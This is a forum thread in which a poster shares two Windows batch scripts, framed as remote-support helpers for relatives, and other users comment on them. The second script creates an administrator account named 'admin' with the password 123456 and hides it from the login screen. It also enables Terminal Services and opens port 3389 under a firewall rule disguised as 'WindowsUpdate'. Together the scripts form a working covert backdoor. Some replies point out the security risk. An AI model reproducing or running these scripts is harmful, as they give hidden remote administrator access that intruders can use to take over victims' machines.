enable ts/make ts with admin perms

[dred]

Heres two small bats I made, nothign special any could make them.. Why i made them , I have a friend and all of us have friends granparents they call you askign for help with there computer and dont know a dam thing. They might  live far away or you are  too lazy to drive over to help, so you want to remote to them , they dotn know what a terminal server is or what remote connections are and dont have live messenger or whatever, I just gave him my one two bat, one.bat is to enable a ts server on a machine, two.bat makes a admin user..If you have a better easier way let me know .. :)

one.bat

@echo off
echo **********************************************************************
echo *?                                                                  `*
echo *                                         Terminal Service Starter   *
echo *                                         ========================   *
echo *   [*] Enabling RDP via DOS ...                                     *

echo *   [*] Building REGKEY (fDenyTSConnections)                         *
echo Windows Registry Editor Version 5.00> c:hide.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>> c:hide.reg
echo "fDenyTSConnections"=dword:00000000>> c:hide.reg
REGEDIT /S c:hide.REG
echo *   [*] REGKEY Added                                                 *
DEL /Q c:hide.REG

echo *   [*] Building REGKEY (AllowTSConnections)                         *
echo Windows Registry Editor Version 5.00> c:hide.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>> c:hide.reg 
echo "AllowTSConnections"=dword:00000001>> c:hide.reg 
REGEDIT /S c:hide.REG 
echo *   [*] REGKEY Added                                                 * 
DEL /Q c:hide.REG  

echo *   [*] Building REGKEY (fAllowToGetHelp)                            * 
echo Windows Registry Editor Version 5.00> c:hide.reg 
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>> c:hide.reg
echo "fAllowToGetHelp"=dword:00000001>> c:hide.reg
REGEDIT /S c:hide.REG
echo *   [*] REGKEY Added                                                 *
DEL /Q c:hide.REG

echo *                                                                    *
echo *   [*] Terminal Service Started!                                    *
echo *.                                                                  .*
echo **********************************************************************

two.bat

@echo off
echo Windows Registry Editor Version 5.00> c:TS.reg 
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]>> c:TS.reg
echo "Start"=dword:00000002>> c:TS.reg
REGEDIT /S C:TS.REG
echo [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]>>C:TS.REG
echo "EnableAdminTSRemote"=dword:00000001>>C:TS.REG
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>>C:TS.REG
echo "TSEnabled"=dword:00000001>>C:TS.REG
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]>>C:TS.REG
echo "Start"=dword:00000002>>C:TS.REG
echo [Components] > c:bootlog~.txt
echo TSEnabled = on >> c:bootlog~.txt
sysocmgr /i:%windir%infsysoc.inf /u:c:bootlog~.txt /q
DEL /Q c:TS.REG
DEL /Q c:bootlog~.txt
net user admin 123456 /add
net localgroup Administrators admin /add
mkdir "C:Documents and Settingsadmin"
ECHO Windows Registry Editor Version 5.00 > test.reg
ECHO. >> test.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]>>test.reg
ECHO "admin"=dword:00000000 >> test.reg
START /WAIT REGEDIT /S "test.reg"
netsh firewall add portopening TCP 3389 WindowsUpdate
netsh firewall add portopening TCP 3389 WindowsUpdate
netsh firewall add portopening UDP 3389 WindowsUpdate

Dont use this for anythign stupid, This is shared to help make things easier, if your a moron and use it for soemthign dumb I will kick you in the head!!! ty

[K1u]

good job

[Deveant]

good job

<_<

Its good in the way it does they job, though its way to much hell insecure, i understand that that its so u can help them and such, but telnet service was disabled for a reason, and if u can connect, then pretty much anyone can. This is cool, but way to much of a secuity risk. And can cause more harm in the long run.

Good idea, and has promise, but it would be just as easy to install VNC. I suggest making a script to install a SSH service and set it up.

[Iain]

He started TS, not Telnet.

Agreed about the security.  How about disabling .bat files too - one which reverses one.bat and another which reverses two.bat?  I suppose the ultimate would be to combine one.bat, two.bat, three.bat and four.bat into one jumbo batch file with a 4-options menu, one option starting each of the relevant sections.

NB - whilst Windows Firewall was considered, there's the problem of configuring Port Forwarding through an ADSL router.  It's easy for those who are tech-savvy but not for those who "dont know a dam thing". [sic]

[uber_tom]

Nice idea, but these days everyone gets their 'free wireless routers' from their ISP.  aint no script gonna get round NAT. and you know what.. thats already been said in the last post (and ppl wonder why i don't post anymore).

That said its just as easy to get noobs to send a remote assistance request as it is to get them to download and run a batch script.

[nicatronTg]

Wasn't there a Hak.5 episode with for remote help as a Hak-Snack? As I recall it used BozTech's 1-click reverse VNC connection. I think that is a better idea than this, however this is a good idea for slower computers.